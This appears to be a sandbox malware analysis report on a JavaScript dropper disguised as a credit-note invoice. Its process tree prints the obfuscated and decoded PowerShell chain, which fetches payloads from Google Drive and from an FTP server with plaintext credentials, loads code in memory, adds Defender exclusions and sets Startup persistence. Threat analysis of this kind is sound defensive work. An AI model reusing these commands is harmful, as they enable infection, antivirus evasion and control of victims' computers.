Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13-11-2024 20:04

General

  • Target

    INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js

  • Size

    196KB

  • MD5

    0dfe5dafeec713de2d6449c7980ac842

  • SHA1

    61c9a5d13802e747a8feec2f88d3de52e32ca32c

  • SHA256

    380f33fdb8df5c4848c2e50bc34d232178acb50bde94c58c1076196f876e7859

  • SHA512

    ddda548c0ce78a29fa944312533dc01138a655e672af1bb5eb9c63823b0e3412b9c99ad4e643cf7916c6a57537bf8a55583f934b74c70fc68c9d6c19d4cb549a

  • SSDEEP

    3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+9DWXt+NWXt+NWXt+NWXt+NWXt+NWy:uz

Malware Config

Extracted

  • Language
    ps1
  • Source
  • URLs
    exe.dropper: https://drive.google.com/uc?export=download&id=

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    ftp.desckvbrat.com.br
  • Port:
    21
  • Username:
    desckvbrat1
  • Password:
    mfnEdMDLnE@@1578

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 11 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 57 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + 'LAEEAVA' + [char]66 + 'pAGgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQASw' + [char]66 + '' + [char]66 + 'AFQAaQ' + [char]66 + 'oACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'wAG4Acg' + [char]66 + 'kAHkAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAaw' + [char]66 + 'sAGsAQQ' + [char]66 + 'FACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAaw' + [char]66 + 'sAGsAQQ' + [char]66 + 'FACAAKQAgAHsAJA' + [char]66 + 'wAG4Acg' + [char]66 + 'kAHkAIAA9ACAAKAAkAHAAbg' + [char]66 + 'yAGQAeQAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 
'lAGwAcw' + [char]66 + 'lACAAewAkAHAAbg' + [char]66 + 'yAGQAeQAgAD0AIAAoACQAcA' + [char]66 + 'uAHIAZA' + [char]66 + '5ACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'xAHYAaw' + [char]66 + 'xAGYALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAcA' + [char]66 + 'uAHIAZA' + [char]66 + '5ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAEoAbg' + [char]66 + '5AGcAbAAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '0AGsAcA' + [char]66 + 
'sAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQASg' + [char]66 + 'uAHkAZw' + [char]66 + 'sACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 
'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAYQ' + [char]66 + '' + [char]66 + 'AEEASQ' + [char]66 + 'lACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAA9ACAAKA' 
+ [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACAAKwAgACcAZA' + [char]66 + 'sAGwAMAAxAC4AdA' + [char]66 + '4AHQAJwApADsAIAAkAGMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAIAA9ACAAKA' + [char]66 + 'OAGUAdwAtAE8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0ACAAUA' + [char]66 + 'TAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACAAKA' + [char]66 + 'DAG8Abg' + [char]66 + '2AGUAcg' + [char]66 + '0AFQAbwAtAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'lAFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 'nACAALQ' + [char]66 + '' + [char]66 + 'AHMAUA' + [char]66 + 'sAGEAaQ' + [char]66 + 'uAFQAZQ' + [char]66 + '4AHQAIAAtAEYAbw' + [char]66 + 'yAGMAZQAgAC0AUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAA5ACwAIAAxADAAMgAsACAAMQAxADAALAAgADYAOQAsACAAMQAwADAALAAgADcANwAsACAANgA4ACwAIAA3ADYALAAgADEAMQAwACwAIAA2ADkALAAgADYANAAsACAANgA0ACwAIAA0ADkALAAgADUAMwAsACAANQA1ACwAIAA1ADYAIAApACkAKQApACkAOwA7AEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lAC0AVw' + [char]66 + 'lAGIAUg' + [char]66 + 'lAHEAdQ' + [char]66 + 'lAHMAdAAgAC0AVQ' + [char]66 + 'SAEkAIAAkAGEAQQ' + [char]66 + '' + [char]66 + 'AEkAZQAgAC0ATw' + [char]66 + '1AHQARg' + [char]66 + 'pAGwAZQAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAALQ' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAAJA' + [char]66 + 'jAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sACAALQ' + [char]66 + 'VAHMAZQ' + [char]66 + 'CAGEAcw' + [char]66 + 'pAGMAUA' + [char]66 + 'hAHIAcw' + 
[char]66 + 'pAG4AZwAgADsAYw' + [char]66 + 'tAGQALg' + [char]66 + 'lAHgAZQAgAC8AYwAgADsAcA' + [char]66 + 'pAG4AZwAgADEAMgA3AC4AMAAuADAALgAxACAAOw' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIAAtAGMAbw' + [char]66 + 'tAG0AYQ' + [char]66 + 'uAGQAIA' + [char]66 + '7ACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAPQAgACgAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMQAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'jAHoAcg' + [char]66 + 'sAGwAIAA9ACAAKAAgAEcAZQ' + [char]66 + '0AC0AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'lAG4AdAAgAC0AUA' + [char]66 + 'hAHQAaAAgACQAWQ' + [char]66 + 'EAEsAZQ' + [char]66 + 'CACAAKQAgADsASQ' + [char]66 + 'uAHYAbw' + [char]66 + 'rAGUALQ' + [char]66 + 'XAGUAYg' + [char]66 + 'SAGUAcQ' + [char]66 + '1AGUAcw' + [char]66 + '0ACAALQ' + [char]66 + 'VAFIASQAgACQAYw' + [char]66 + '6AHIAbA' + [char]66 + 'sACAALQ' + [char]66 + 'PAHUAdA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACAAJA' + [char]66 + 'ZAEQASw' + [char]66 + 'lAEIAIAAtAFUAcw' + [char]66 + 'lAEIAYQ' + [char]66 + 'zAGkAYw' + [char]66 + 'QAGEAcg' + [char]66 + 'zAGkAbg' + [char]66 + 'nAH0AIAA7ACQAcQ' + [char]66 + 'hAHEAeA' + [char]66 + 'FACAAPQAgACgAIA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + '0AGgAIAAkAFkARA' + [char]66 + 'LAGUAQgAgAC0ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAVQ' + [char]66 + 'UAEYAOAApACAAOw' + [char]66 + 'bAEIAeQ' + [char]66 + '0AGUAWw' + [char]66 + 'dAF0AIAAkAGQAQw' + [char]66 + 'pAFcAegAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AQw' + [char]66 + 'vAG4Adg' + [char]66 + 'lAHIAdA' + [char]66 + 'dADoAOg' + [char]66 + 'GAHIAbw' + [char]66 + 'tAEIAYQ' + [char]66 + 'zAGUANgA0AFMAdA' + [char]66 + 'yAGkAbg' + [char]66 + 
'nACgAIAAkAHEAYQ' + [char]66 + 'xAHgARQAuAFIAZQ' + [char]66 + 'wAGwAYQ' + [char]66 + 'jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApACAAOwAkAG4Aag' + [char]66 + 'jAGIAcQAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcw' + [char]66 + 'MAGkAYg' + [char]66 + 'yAGEAcg' + [char]66 + '5ADMALgAnACAAOwAkAEwATA' + [char]66 + 'RAHUAZAAgAD0AIAAnAEMAbA' + [char]66 + 'hAHMAcwAxACcAIAA7ACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAPQAgACcAcA' + [char]66 + 'yAEYAVg' + [char]66 + 'JACcAIAA7AFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAG8AbQ' + [char]66 + 'hAGkAbg' + [char]66 + 'dADoAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAApAC4ARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJA' + [char]66 + 'uAGoAYw' + [char]66 + 'iAHEAIAArACAAJA' + [char]66 + 'MAEwAUQ' + [char]66 + '1AGQAIAApAC4ARw' + [char]66 + 'lAHQATQ' + [char]66 + 'lAHQAaA' + [char]66 + 'vAGQAKAAgACQAbg' + [char]66 + 'lAFUAbQ' + [char]66 + 'WACAAKQAuAEkAbg' + [char]66 + '2AG8Aaw' + [char]66 + 'lACgAJA' + [char]66 + 'uAHUAbA' + [char]66 + 'sACwAIA' + [char]66 + 'bAG8AYg' + [char]66 + 'qAGUAYw' + [char]66 + '0AFsAXQ' + [char]66 + 'dACAAKAAgACcAMAAvAGgANw' + [char]66 + 'SAEsASgAvAHIALw' + [char]66 + 'lAGUALg' + [char]66 + 'lAHQAcw' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAAsACAAJwAlAEQAQw' + [char]66 + 'QAEoAVQAlACcALAAgACcARAAgAEQAMQ' + [char]66 + 'EAEEAZA' + [char]66 + 'kAEkAbg' + [char]66 + 'QAHIAbw' + [char]66 + 'jAGUAcw' + [char]66 + 'zADMAMgAnACAAKQAgACkAIAA7AH0AOwA=';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js') ;powershell $jPhaA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$KATih = $host.Version.Major.Equals(2);If ( $KATih ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$pnrdy = 'https://drive.google.com/uc?export=download&id=';$klkAE = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $klkAE ) {$pnrdy = ($pnrdy + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$pnrdy = ($pnrdy + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$qvkqf = ( New-Object Net.WebClient ) ;$qvkqf.Encoding = [System.Text.Encoding]::UTF8 ;$qvkqf.DownloadFile($pnrdy, ($HzOMj + '\Upwin.msu') ) ;$Jnygl = ( 'C:\Users\' + [Environment]::UserName );tkplB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js' -Destination ( $Jnygl + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$aAAIe = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt') ;$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt'); $credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](109, 102, 110, 69, 100, 77, 68, 76, 110, 69, 64, 64, 49, 53, 55, 56 )))));;Invoke-WebRequest -URI $aAAIe -OutFile $YDKeB -Credential $credential -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$czrll = ( Get-Content -Path $YDKeB ) ;Invoke-WebRequest -URI $czrll -OutFile $YDKeB -UseBasicParsing} ;$qaqxE = ( Get-Content -Path $YDKeB -Encoding UTF8) 
;[Byte[]] $dCiWz = [System.Convert]::FromBase64String( $qaqxE.Replace( '↓:↓' , 'A' ) ) ;$njcbq = 'ClassLibrary3.' ;$LLQud = 'Class1' ;$neUmV = 'prFVI' ;[System.AppDomain]::CurrentDomain.Load( $dCiWz ).GetType( $njcbq + $LLQud ).GetMethod( $neUmV ).Invoke($null, [object[]] ( '0/h7RKJ/r/ee.etsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js', 'D D1DAddInProcess32' ) ) ;};"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2080
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c
          4⤵
            PID:2348
          • C:\Windows\system32\PING.EXE
            "C:\Windows\system32\PING.EXE" 127.0.0.1
            4⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:736
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABZAEQASwBlAEIAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAGMAegByAGwAbAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABZAEQASwBlAEIAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJABjAHoAcgBsAGwAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAFkARABLAGUAQgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4692
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4068
          • C:\Windows\SYSTEM32\cmd.exe
            cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\"
            4⤵
